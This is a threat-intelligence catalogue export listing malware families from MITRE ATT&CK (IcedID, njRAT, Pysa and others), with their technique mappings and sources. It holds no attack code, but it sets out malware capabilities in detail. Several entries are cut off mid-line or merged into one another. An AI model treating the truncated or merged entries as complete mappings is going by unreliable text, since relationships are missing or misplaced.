[Avenger](https://attack.mitre.org/software/S0473) is a downloader that has been used by [BRONZE BUTLER](https://attack.mitre.org/groups/G0060) since at least 2019. (Citation: Trend Micro Tick November 2019)

The tag is: *misp-galaxy:mitre-malware="Avenger - S0473"*

Avenger - S0473 is also known as:

- Avenger

Avenger - S0473 has relationships with:

- uses: *misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"
- uses: *misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140" with estimative-language:likelihood-probability="almost-certain"
- uses: *misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
- uses: *misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"
- uses: *misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1016" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Steganography - T1027.003" with estimative-language:likelihood-probability="almost-certain"

Table 4810. Table References

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<td><a href="https://attack.mitre.org/software/S0473">https://attack.mitre.org/software/S0473</a></td>
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</table>

**Kivars - S0437**

[Kivars](https://attack.mitre.org/software/S0437) is a modular remote access tool (RAT), derived from the Bifrost RAT, that was used by [BlackTech](https://attack.mitre.org/groups/G0098) in a 2010 campaign.(Citation: TrendMicro BlackTech June 2017)

The tag is: *misp-galaxy:mitre-malware="Kivars - S0437"*

Kivars - S0437 is also known as:

• Kivars

Kivars - S0437 has relationships with:

• uses: misp-galaxy:mitre-attack-pattern="Remote Services - T1021" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Hidden Window - T1564.003" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Screen Capture - T1113" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Keylogging - T1056.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"

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</table>
SpeakUp - S0374

[SpeakUp](https://attack.mitre.org/software/S0374) is a Trojan backdoor that targets both Linux and OSX devices. It was first observed in January 2019. (Citation: CheckPoint SpeakUp Feb 2019)

The tag is: `misp-galaxy:mitre-malware="SpeakUp - S0374"`

SpeakUp - S0374 is also known as:

- SpeakUp

SpeakUp - S0374 has relationships with:

- uses: `misp-galaxy:mitre-attack-pattern="Password Guessing - T1110.001"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Exploitation for Client Execution - T1203"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105"` with estimative-
Table 4812. Table References

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<td><a href="https://research.checkpoint.com/speakup-a-new-undetected-backdoor-linux-trojan/">https://research.checkpoint.com/speakup-a-new-undetected-backdoor-linux-trojan/</a></td>
</tr>
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</table>

**Attor - S0438**

[Attor](https://attack.mitre.org/software/S0438) is a Windows-based espionage platform that has been seen in use since 2013. [Attor](https://attack.mitre.org/software/S0438) has a loadable plugin architecture to customize functionality for specific targets. (Citation: ESET Attor Oct 2019)

The tag is: *misp-galaxy:mitre-malware="Attor - S0438"

Attor - S0438 is also known as:

- Attor

Attor - S0438 has relationships with:

- uses: *misp-galaxy:mitre-attack-pattern="Hidden Files and Directories - T1564.001" with estimative-language:likelihood-probability="almost-certain"
- uses: *misp-galaxy:mitre-attack-pattern="Logon Script (Windows) - T1037.001" with estimative-language:likelihood-probability="almost-certain"
- uses: *misp-galaxy:mitre-attack-pattern="Application Window Discovery - T1010" with estimative-language:likelihood-probability="almost-certain"
- uses: *misp-galaxy:mitre-attack-pattern="Scheduled Task - T1053.005" with estimative-language:likelihood-probability="almost-certain"
- uses: *misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
- uses: *misp-galaxy:mitre-attack-pattern="Local Data Staging - T1074.001" with estimative-language:likelihood-probability="almost-certain"
- uses: *misp-galaxy:mitre-attack-pattern="System Checks - T1497.001" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Query Registry - T1012" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Symmetric Cryptography - T1573.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Multi-hop Proxy - T1090.003" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Shared Modules - T1129" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Native API - T1106" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Exfiltration Over C2 Channel - T1041" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Asynchronous Procedure Call - T1055.004" with estimative-language:likelihood-probability="almost-certain"


• uses: misp-galaxy:mitre-attack-pattern="Automated Exfiltration - T1020" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Process Injection - T1055" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Windows Service - T1543.003" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Timestomp - T1070.006" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Keylogging - T1056.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Clipboard Data - T1115" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Archive via Custom Method - T1560.003" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Audio Capture - T1123" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Screen Capture - T1113" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Peripheral Device Discovery - T1120" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Masquerade Task or Service - T1036.004" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Asymmetric Cryptography - T1573.002" with estimative-language:likelihood-probability="almost-certain"

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IcedID - S0483

[IcedID](https://attack.mitre.org/software/S0483) is a modular banking malware designed to steal financial information that has been observed in the wild since at least 2017. [IcedID](https://attack.mitre.org/software/S0483) has been downloaded by [Emotet](https://attack.mitre.org/software/S0367) in multiple campaigns.(Citation: IBM IcedID November 2017)(Citation: Juniper IcedID June 2020)

The tag is: misp-galaxy:mitre-malware="IcedID - S0483"

IcedID - S0483 is also known as:

• IcedID

IcedID - S0483 has relationships with:

• uses: misp-galaxy:mitre-attack-pattern="Asynchronous Procedure Call - T1055.004" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Asymmetric Cryptography - T1573.002" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Domain Account - T1087.002" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Man in the Browser - T1185" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Permission Groups Discovery - T1069" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Windows Management Instrumentation - T1047" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Malicious File - T1204.002" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Spearphishing Attachment - T1566.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Native API - T1106" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Msiexec - T1218.007" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Visual Basic - T1059.005" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Scheduled Task - T1053.005" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Software Packing - T1027.002" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Steganography - T1027.003" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"

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Dridex - S0384

[Dridex](https://attack.mitre.org/software/S0384) is a banking Trojan that has been used for financial gain. Dridex was created from the source code of the Bugat banking trojan (also known as Cridex). (Citation: Dell Dridex Oct 2015)(Citation: Kaspersky Dridex May 2017)

The tag is: misp-galaxy:mitre-malware="Dridex - S0384"
Dridex - S0384 is also known as:

- Dridex
- Bugat v5

Dridex - S0384 has relationships with:


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<td><a href="https://securelist.com/dridex-a-history-of-evolution/78531/">https://securelist.com/dridex-a-history-of-evolution/78531/</a></td>
</tr>
</tbody>
</table>

GoldenSpy - S0493

GoldenSpy (https://attack.mitre.org/software/S0493) is a backdoor malware which has been packaged with legitimate tax preparation software. [GoldenSpy](https://attack.mitre.org/software/S0493) was discovered targeting organizations in China, being delivered with the "Intelligent Tax" software suite which is produced by the Golden Tax Department of Aisino Credit Information Co. and required to pay local taxes.(Citation: Trustwave GoldenSpy June 2020)

The tag is: misp-galaxy:mitre-malware="GoldenSpy - S0493"

GoldenSpy - S0493 is also known as:

- GoldenSpy

GoldenSpy - S0493 has relationships with:

- uses: misp-galaxy:mitre-attack-pattern="Native API - T1106" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Match Legitimate Name or Location - T1036.005" with
HiddenWasp - S0394

[HiddenWasp](https://attack.mitre.org/software/S0394) is a Linux-based Trojan used to target systems for remote control. It comes in the form of a statically linked ELF binary with stdlibc++. (Citation: Intezer HiddenWasp Map 2019)

The tag is: `misp-galaxy:mitre-malware="HiddenWasp - S0394"`
HiddenWasp - S0394 is also known as:

- HiddenWasp

HiddenWasp - S0394 has relationships with:

- uses: misp-galaxy:mitre-attack-pattern="RC Scripts - T1037.004" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Local Account - T1136.001" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Uncommonly Used Port - T1065" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Rootkit - T1014" with estimative-language:likelihood-probability="almost-certain"

Table 4817. Table References

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<th>Links</th>
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<tr>
<td><a href="https://attack.mitre.org/software/S0394">https://attack.mitre.org/software/S0394</a></td>
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<tr>
<td><a href="https://www.intezer.com/blog-hiddenwasp-malware-targeting-linux-systems/">https://www.intezer.com/blog-hiddenwasp-malware-targeting-linux-systems/</a></td>
</tr>
</tbody>
</table>

**Okrum - S0439**

[Okrum](https://attack.mitre.org/software/S0439) is a Windows backdoor that has been seen in use since December 2016 with strong links to [Ke3chang](https://attack.mitre.org/groups/G0004). (Citation: ESET Okrum July 2019)

The tag is: misp-galaxy:mitre-malware="Okrum - S0439"

Okrum - S0439 is also known as:
Okrum

Okrum - S0439 has relationships with:

- uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Hidden Files and Directories - T1564.001" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Cached Domain Credentials - T1003.005" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Scheduled Task - T1053.005" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Keylogging - T1056.001" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Windows Service - T1543.003" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="System Owner/User Discovery - T1033" with estimative-
Table 4818. Table References

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<tr>
<td><a href="https://attack.mitre.org/software/S0439">https://attack.mitre.org/software/S0439</a></td>
</tr>
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</table>

**MoleNet - S0553**

[MoleNet](https://attack.mitre.org/software/S0553) is a downloader tool with backdoor capabilities that has been observed in use since at least 2019. (Citation: Cybereason Molerats Dec 2020)

The tag is: **misp-galaxy:mitre-malware="MoleNet - S0553"**
MoleNet - S0553 is also known as:

- MoleNet

MoleNet - S0553 has relationships with:

- uses: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"

**Table 4819. Table References**

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<tr>
<td><a href="https://attack.mitre.org/software/S0553">https://attack.mitre.org/software/S0553</a></td>
</tr>
</tbody>
</table>

**GPlayed - S0536**

[GPlayed](https://attack.mitre.org/software/S0536) is an Android trojan with a broad range of capabilities.(Citation: Talos GPlayed)

The tag is: *misp-galaxy:mitre-malware="GPlayed - S0536"*

GPlayed - S0536 is also known as:

- GPlayed

GPlayed - S0536 has relationships with:

- uses: misp-galaxy:mitre-attack-pattern="Masquerade as Legitimate Application - T1444" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Broadcast Receivers - T1402" with estimative-
• uses: misp-galaxy:mitre-attack-pattern="Location Tracking - T1430" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Delete Device Data - T1447" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Capture SMS Messages - T1412" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Application Discovery - T1418" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Access Contact List - T1432" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="SMS Control - T1582" with estimative-language:likelihood-probability="almost-certain"


• uses: misp-galaxy:mitre-attack-pattern="Device Lockout - T1446" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Scheduled Task/Job - T1603" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1426" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Device Administrator Permissions - T1401" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Input Prompt - T1411" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Data from Local System - T1533" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1406" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1422" with estimative-language:likelihood-probability="almost-certain"

Table 4820. Table References

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<td><a href="https://attack.mitre.org/software/S0536">https://attack.mitre.org/software/S0536</a></td>
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<tr>
<td><a href="https://blog.talosintelligence.com/2018/10/gplayedtrojan.html">https://blog.talosintelligence.com/2018/10/gplayedtrojan.html</a></td>
</tr>
</tbody>
</table>

**KONNI - S0356**

[KONNI](https://attack.mitre.org/software/S0356) is a Windows remote administration too that has
been seen in use since 2014 and evolved in its capabilities through at least 2017. [KONNI](https://attack.mitre.org/software/S0356) has been linked to several campaigns involving North Korean themes. (Citation: Talos Konni May 2017) [KONNI](https://attack.mitre.org/software/S0356) has significant code overlap with the [NOKKI](https://attack.mitre.org/software/S0353) malware family. There is some evidence potentially linking [KONNI](https://attack.mitre.org/software/S0356) to [APT37](https://attack.mitre.org/groups/G0067). (Citation: Unit 42 NOKKI Sept 2018) (Citation: Unit 42 Nokki Oct 2018) (Citation: Medium KONNI Jan 2020)

The tag is: `misp-galaxy:mitre-malware="KONNI - S0356"`

KONNI - S0356 is also known as:

- KONNI

KONNI - S0356 has relationships with:

- uses: `misp-galaxy:mitre-attack-pattern="Keylogging - T1056.001"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Credentials from Web Browsers - T1555.003"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Match Legitimate Name or Location - T1036.005"` with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Clipboard Data - T1115" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Standard Encoding - T1132.001" with estimative-language:likelihood-probability="almost-certain"


• uses: misp-galaxy:mitre-attack-pattern="Process Discovery - T1057" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Bypass User Account Control - T1548.002" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Component Object Model Hijacking - T1546.015" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Create Process with Token - T1134.002" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Rundll32 - T1218.011" with estimative-language:likelihood-probability="almost-certain"

Table 4821. Table References

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<tr>
<td><a href="https://attack.mitre.org/software/S0537">HyperStack</a> is a RPC-based backdoor used by <a href="https://attack.mitre.org/groups/G0010">Turla</a> since at least 2018. <a href="https://attack.mitre.org/software/S0537">HyperStack</a> has similarities to other backdoors used by <a href="https://attack.mitre.org/groups/G0010">Turla</a> including <a href="https://attack.mitre.org/software/S0335">Carbon</a>. (Citation: Accenture HyperStack October 2020)</td>
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The tag is: misp-galaxy:mitre-malware="HyperStack - S0537"

HyperStack - S0537 is also known as:

- HyperStack

HyperStack - S0537 has relationships with:

- uses: misp-galaxy:mitre-attack-pattern="Default Accounts - T1078.001" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Inter-Process Communication - T1559" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Native API - T1106" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Local Account - T1087.001" with estimative-language:likelihood-probability="almost-certain"

Table 4822. Table References

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<td><a href="https://attack.mitre.org/software/S0537">https://attack.mitre.org/software/S0537</a></td>
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</table>

**Remexi - S0375**

[Remexi](https://attack.mitre.org/software/S0375) is a Windows-based Trojan that was developed in the C programming language. (Citation: Securelist Remexi Jan 2019)

The tag is: misp-galaxy:mitre-malware="Remexi - S0375"

Remexi - S0375 is also known as:

- Remexi

Remexi - S0375 has relationships with:

- uses: misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140" with estimative-language:likelihood-probability="almost-certain"
Table 4823. Table References

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<td><a href="https://attack.mitre.org/software/S0375">https://attack.mitre.org/software/S0375</a></td>
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<tr>
<td><a href="https://securelist.com/chafer-used-remexi-malware/89538/">https://securelist.com/chafer-used-remexi-malware/89538/</a></td>
</tr>
</tbody>
</table>

njRAT - S0385

[njRAT](https://attack.mitre.org/software/S0385) is a remote access tool (RAT) that was first observed in 2012. It has been used by threat actors in the Middle East.(Citation: Fidelis njRAT June 2013)

The tag is: misp-galaxy:mitre-malware="njRAT - S0385"

njRAT - S0385 is also known as:
njRAT - S0385 has relationships with:

- uses: misp-galaxy:mitre-attack-pattern="Video Capture - T1125" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Keylogging - T1056.001" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Indicator Removal on Host - T1070" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Replication Through Removable Media - T1091" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Uncommonly Used Port - T1065" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Disable or Modify System Firewall - T1562.004" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Application Window Discovery - T1010" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Peripheral Device Discovery - T1120" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Data from Local System - T1005" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Credentials from Web Browsers - T1555.003" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Query Registry - T1012" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Fast Flux DNS - T1568.001" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Compile After Delivery - T1027.004" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Native API - T1106" with estimative-language:likelihood-probability="almost-certain"

Table 4824. Table References

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<td><a href="https://attack.mitre.org/software/S0385">https://attack.mitre.org/software/S0385</a></td>
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<tr>
<td><a href="https://www.fireeye.com/blog/threat-research/2013/08/njw0rm-brother-from-the-same-mother.html">https://www.fireeye.com/blog/threat-research/2013/08/njw0rm-brother-from-the-same-mother.html</a></td>
</tr>
</tbody>
</table>
Crutch - S0538

[Crutch](https://attack.mitre.org/software/S0538) is a backdoor designed for document theft that has been used by [Turla](https://attack.mitre.org/groups/G0010) since at least 2015.(Citation: ESET Crutch December 2020)

The tag is: `misp-galaxy:mitre-malware="Crutch - S0538"

Crutch - S0538 is also known as:

- Crutch

Crutch - S0538 has relationships with:

- uses: `misp-galaxy:mitre-attack-pattern="DLL Search Order Hijacking - T1574.001"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Data from Local System - T1005"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Data from Removable Media - T1025"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Fallback Channels - T1008"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Local Data Staging - T1074.001"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Scheduled Task - T1053.005"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Masquerade Task or Service - T1036.004"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Peripheral Device Discovery - T1120"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Exfiltration Over C2 Channel - T1041"` with estimative-
Pysa - S0583

[Pysa](https://attack.mitre.org/software/S0583) is a ransomware that was first used in October 2018 and has been seen to target particularly high-value finance, government and healthcare organizations.(Citation: CERT-FR PYSA April 2020)

The tag is: `misp-galaxy:mitre-malware="Pysa - S0583"`

Pysa - S0583 is also known as:

- Pysa
- Mespinoza

Pysa - S0583 has relationships with:

- uses: `misp-galaxy:mitre-attack-pattern="Modify Registry - T1112"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Data Encrypted for Impact - T1486"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Match Legitimate Name or Location - T1036.005"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Credentials In Files - T1552.001"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Disable or Modify Tools - T1562.001"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Service Stop - T1489"` with estimative-
• uses: misp-galaxy:mitre-attack-pattern="LSASS Memory - T1003.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Service Execution - T1569.002" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Network Service Scanning - T1046" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1016" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"

Table 4826. Table References

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<td><a href="https://attack.mitre.org/software/S0583">https://attack.mitre.org/software/S0583</a></td>
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<tr>
<td><a href="https://digital.nhs.uk/cyber-alerts/2020/cc-3633">https://digital.nhs.uk/cyber-alerts/2020/cc-3633</a></td>
</tr>
</tbody>
</table>

**ECCENTRICBANDWAGON - S0593**

[ECCENTRICBANDWAGON](https://attack.mitre.org/software/S0593) is a Remote Access Tool (RAT) used by [Lazarus Group](https://attack.mitre.org/groups/G0032) that was first identified in August 2020. It is a reconnaissance tool—with keylogging and screen capture functionality—used for information gathering on compromised systems. (Citation: CISA EB Aug 2020)

The tag is: `misp-galaxy:mitre-malware="ECCENTRICBANDWAGON - S0593"`

**ECCENTRICBANDWAGON - S0593** is also known as:

• **ECCENTRICBANDWAGON**

**ECCENTRICBANDWAGON - S0593** has relationships with:

• uses: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Screen Capture - T1113" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Keylogging - T1056.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Local Data Staging - T1074.001" with estimative-
LightNeuron - S0395

